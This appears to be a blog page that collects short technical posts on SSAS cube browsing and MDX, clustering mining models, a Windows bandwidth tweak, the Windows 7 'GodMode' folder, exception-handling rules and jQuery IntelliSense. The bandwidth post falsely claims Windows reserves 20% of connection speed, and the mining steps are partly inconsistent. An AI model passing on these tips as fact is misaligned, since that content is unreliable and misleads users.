Now that the cube has been deployed, switch the BIDS Cube Designer view to the Browser page. In the Browser page you will see three panes: a Measure Group pane, a Filter pane, and a Data pane. Suppose you want to analyze the Internet sales of products based on the promotions offered to customers and the marital status of those customers. First, drag and drop [DimPromotion].[English Promotion Type] from the Measure Group pane to the OWC rows area. Next, drag and drop [DimCustomer].[Marital Status] from the Measure Group pane to the OWC columns area. Finally, drag and drop the measure [Sales Amount] from the Fact Internet Sales measure group to the Drop Totals or Detail Fields Here area of the OWC pane.

You can also use MDX queries to query the cube. Just as SQL (Structured Query Language) is a query language used to retrieve data from relational databases, MDX (Multi-Dimensional Expressions) is a query language used to retrieve data from multidimensional databases, and its form is similar to SQL.

The format of MDX query is shown below:

SELECT [<axis expression>, [<axis expression> ...]]
FROM [<cube_expression>]
[WHERE [slicer_expression]]
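For instance, here is a hypothetical query against the Adventure Works DW cube built above (the measure and attribute names are assumed to match the ones created earlier) that slices Internet sales by promotion type for married customers:

SELECT [Measures].[Sales Amount] ON COLUMNS,
       [DimPromotion].[English Promotion Type].MEMBERS ON ROWS
FROM [Adventure Works DW]
WHERE ([DimCustomer].[Marital Status].&[M])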

5) Creating a Mining Structure

Analysis Services 2008 provides nine data mining algorithms that can be utilized to solve various business problems. These algorithms can be broadly classified into five categories based on the nature of the business problem they can be applied to. They are:

1) Classification

2) Regression

3) Segmentation

4) Sequence analysis

5) Association

We aim at grouping customers that share similar characteristics.

To create a relational mining model, follow these steps:

a) Right-click the Mining Structures folder in the Solution Explorer and select New Mining Structure to launch the Data Mining Wizard, which helps you create data mining structures and models. Click the Next button.

b) Select the “From existing cube” radio button and click next.

c) Select Microsoft Clustering and click next.

d) Choose the Customer table as the primary table and enter the following attributes as inputs for building clusters:

Age, Yearly Income, Number of cars owned, Number of Children at home and Occupation.

You will now see the clustering mining model represented as several nodes with lines between them. By default the clustering mining model groups the customers into ten clusters; the number of clusters can be changed from a property of the cluster mining model. Each cluster is shown as a node in the cluster viewer. Darker shading on a node indicates that the cluster favors a specific input column, and vice versa. If there is a similarity between two clusters, it is indicated by a line connecting the two nodes; as with the node shading, a stronger relationship between two nodes is indicated via a darker line. You can move the slider on the left of the cluster diagram from All Links to Strongest Links; as you do, the weaker relationships between the clusters are no longer displayed. You can rename a cluster by right-clicking it and selecting Rename. You can select an input column of the mining model from the Shading Variable drop-down to see the effect of that column on the various clusters. When you choose a specific shading variable column, you also need to choose one of the states of the column to be used as the shading variable for the clusters.

The Cluster Profiles view shows the relationship between the mining columns of the model and the clusters in a matrix format. The intersection cell of a specific column and a cluster shows a histogram bar of the various values of the column that are part of the cluster. The size of each bar reflects the number of items used to train the model.

The Cluster Characteristics tab shows the characteristics of a single cluster and how the various states of the input columns make up the cluster.

The Cluster Discrimination tab shows the characteristics of a Cluster in comparison with the characteristics of the complement of this Cluster.

How To Increase Your Internet Connection Speed

It is possible to gain an extra 20% of bandwidth from your internet connection. By default, Windows XP, Windows Vista and Windows 7 reserve 20% of your internet speed for services like Windows Update and other programs that require frequent internet access. This limit is configurable from the Group Policy Object Editor; when the value is set to 0, the reserved 20% is added to your browsing and download speed. The configuration steps are below, followed by an equivalent registry command:

  1. Start -> Run -> GPEdit.msc
  2. Expand the Administrative Templates under Computer Configuration
  3. Expand the Network tab
  4. Select QoS Packet Scheduler
  5. Click on Limit Reservable Bandwidth
  6. Select the Enabled option
  7. Change the Bandwidth limit to 0%
  8. Start -> Run -> “gpupdate /force” Or restart your computer
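On editions of Windows without the Group Policy editor, the same setting can be applied from an elevated command prompt. The Psched key below is the registry location this policy is commonly stored under, so verify it on your system before relying on it:

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Psched" /v NonBestEffortLimit /t REG_DWORD /d 0 /f
gpupdate /force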

Hacking Windows 7: The God Mode


One of the secrets of Windows 7 that is undocumented by Microsoft is the secret option known as God Mode.

GodMode is simply a hidden control panel that gathers all of Windows 7's configuration options and settings in one place, plus additional features that are not easily found in the ordinary Control Panel.

The trick to access GodMode is simple; just follow these steps (or use the one-line command shown after the list):

  • Create a new folder
  • Name the folder with the following name: GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
  • Once created, you should see the folder icon changed to the control panel icon.
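From a command prompt, the same folder can be created in one step (run it in the directory where you want the folder to appear, such as the Desktop):

md "GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}"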

Give it a try and explore the powerful and useful hidden features in windows 7. I have not tested the GodMode on Windows Vista. Try it out and let us know about the results!

Exception Handling Guidelines


When naming exception classes, follow the usual class naming conventions but add Exception to the end of the name.
The rules listed below should be followed in exception blocks and classes:

  1. Never catch an exception and do nothing. If you hide an exception, you will never know whether it happened.
  2. In case of an exception, give a friendly message to the user, but log the actual error with all possible details, including the time it occurred, the method and class name, etc.
  3. Always catch only the specific exception, not generic or system exceptions.
  4. You can have an application-level (thread-level) error handler where you handle all general exceptions. In case of an unexpected general error, this handler should catch the exception and log the error, in addition to giving a friendly message to the user before closing the application or allowing the user to ignore and proceed.
  5. Do not write try-catch in all your methods. Use it only if there is a possibility that a specific exception may occur. For example, if you are writing into a file, handle only FileIOException.
  6. Do not write very large try-catch blocks. If required, write a separate try-catch for each task you perform and enclose only the specific piece of code inside it. This helps you find which piece of code generated the exception, and you can give a specific error message to the user.
  7. You may write your own custom exception classes, if required in your application. Do not derive your custom exceptions from the base class SystemException; instead, inherit from ApplicationException.
  8. To guarantee that resources are cleaned up when an exception occurs, use a try/finally block and close the resources in the finally clause. This ensures that resources are disposed even if an exception occurs.
  9. Error messages should help the user solve the problem. Never give messages like "Error in Application" or "There is an error". Instead, give specific messages like "Failed to update database. Make sure the login id and password are correct."
  10. When displaying error messages, in addition to telling what is wrong, the message should tell the user what to do to solve the problem. Instead of a message like "Failed to update database.", suggest what the user should do: "Failed to update database. Make sure the login id and password are correct."
  11. Show a short and friendly message to the user, but log the actual error with all possible information. This helps a lot in diagnosing problems.
  12. Define a global error handler in Global.asax to catch any exceptions that are not handled in code. Log all exceptions to the event log to record them for tracking and later analysis.

Adding IntelliSense for JQuery in Visual Studio 2008

To set up IntelliSense for jQuery you will need to download the jQuery documentation file from the jQuery site.

At the top of the JavaScript file in which you would like to have jQuery IntelliSense enabled, add a line that references the documentation file:

                                        /// <reference path="jquery-1.3.2-vsdoc2.js" />

If you downloaded jQuery and saved it to your project, Visual Studio will look for the vsdoc.js file automatically if the following conditions are met:

  • You downloaded and installed the hotfix for Visual Studio.
  • jQuery and the documentation file need to be named the same, with the exception that the documentation file ends with -vsdoc.js.
    So when you add jQuery to your project, make sure to name them accordingly. For instance, if jquery-1.3.2.js is your jQuery library,
    Visual Studio will look for the documentation file at jquery-1.3.2-vsdoc.js and load it.

    (Note: the jQuery 1.3.2 documentation file is named jquery-1.3.2-vsdoc2.js on the Download page so make sure you take out
    the 2 so that the file will be found by Visual Studio).

  • To test to make sure the documentation file loaded correctly, you can type $( and you should be presented with some documentation.
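For example, with the files named as above, a script like the following (the #message element id is just a placeholder) gets full jQuery documentation and parameter hints as you type:

    /// <reference path="jquery-1.3.2-vsdoc2.js" />

    // Typing "$(" below now brings up the jQuery documentation
    // and parameter hints in the Visual Studio editor.
    $(document).ready(function () {
        $("#message").text("jQuery IntelliSense is working.");
    });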